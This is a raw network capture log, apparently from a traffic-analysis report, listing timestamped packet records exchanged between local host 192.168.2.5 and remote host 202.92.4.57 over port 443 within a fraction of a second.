                                                                                                                                                                                                    Nov 15, 2024 09:00:18.562994003 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563019991 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563225985 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563267946 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563297987 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563304901 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563338041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563369036 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563446999 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563488007 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563513041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563519001 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563556910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.563579082 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601586103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601625919 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601808071 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601809025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601871967 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601931095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601950884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601967096 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601999044 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.601999998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.602045059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.602057934 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.602088928 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.602128029 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605340004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605381012 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605438948 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605506897 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605542898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605545998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605596066 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605623007 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605638027 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605674028 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.605706930 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.658983946 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.659027100 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.659086943 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.659120083 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.659137964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.659233093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661617994 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661659956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661704063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661711931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661744118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.661767960 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662540913 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662611961 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662621975 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662636995 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662666082 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.662691116 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663036108 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663074017 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663105965 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663113117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663146019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.663167953 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664278030 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664315939 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664341927 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664349079 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664385080 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.664406061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665365934 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665404081 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665443897 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665451050 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665488005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665513039 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665766001 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665821075 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665839911 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665847063 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665879965 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.665921926 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666124105 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666162014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666199923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666213989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666245937 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666286945 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666444063 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666495085 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666536093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666543007 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666574001 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.666598082 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667210102 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667249918 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667289019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667295933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667324066 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.667346954 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668147087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668188095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668221951 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668229103 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668261051 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668283939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668745041 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668785095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668816090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668823004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668855906 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.668880939 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669358015 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669398069 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669435024 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669440985 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669467926 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669493914 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669758081 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669796944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669826984 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669833899 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669867039 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.669898987 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670228958 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670265913 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670296907 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670304060 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670368910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670368910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670547009 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670584917 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670619965 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670628071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670661926 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670681000 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670922995 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.670962095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671034098 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671044111 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671094894 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671176910 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671215057 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671242952 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671252012 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671284914 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671307087 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671447039 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671485901 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671515942 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671524048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671554089 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671588898 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671734095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671772957 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671804905 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671812057 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671844006 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.671871901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672147989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672168016 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672229052 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672240973 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672262907 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672286034 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672293901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672306061 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672343016 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672382116 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672395945 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672413111 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672451019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672463894 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672496080 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.672513008 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.675863028 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.675899029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.675966024 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.675980091 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676049948 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676239967 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676259041 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676315069 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676327944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676383018 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676670074 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676687956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676752090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676764965 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.676829100 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677073002 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677089930 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677150965 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677162886 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677215099 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677241087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677262068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677300930 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677311897 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677340031 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677362919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677474976 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677493095 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677532911 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677545071 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677571058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677638054 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677716017 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677736044 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677778959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677791119 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677817106 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677834988 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677846909 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677866936 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677906990 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677918911 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677947998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.677970886 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678076982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678095102 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678158998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678172112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678240061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678319931 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678339005 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678394079 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678406000 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678435087 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.678476095 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679635048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679651976 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679721117 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679733992 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679781914 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679790020 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679804087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679841995 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679851055 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679878950 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679889917 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679918051 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.679955959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680144072 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680160999 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680224895 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680257082 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680288076 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680320978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680416107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680433989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680516958 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680516958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680529118 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680548906 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680583000 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680596113 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680628061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.680648088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.718727112 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.718776941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.718962908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.718962908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719026089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719096899 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719101906 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719120026 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719173908 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719188929 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719216108 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719228983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719257116 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719302893 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719362020 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719402075 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719647884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719649076 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719743013 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.719818115 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.722825050 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.722866058 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.722915888 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.722981930 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:18.723022938 CET49704443192.168.2.5202.92.4.57
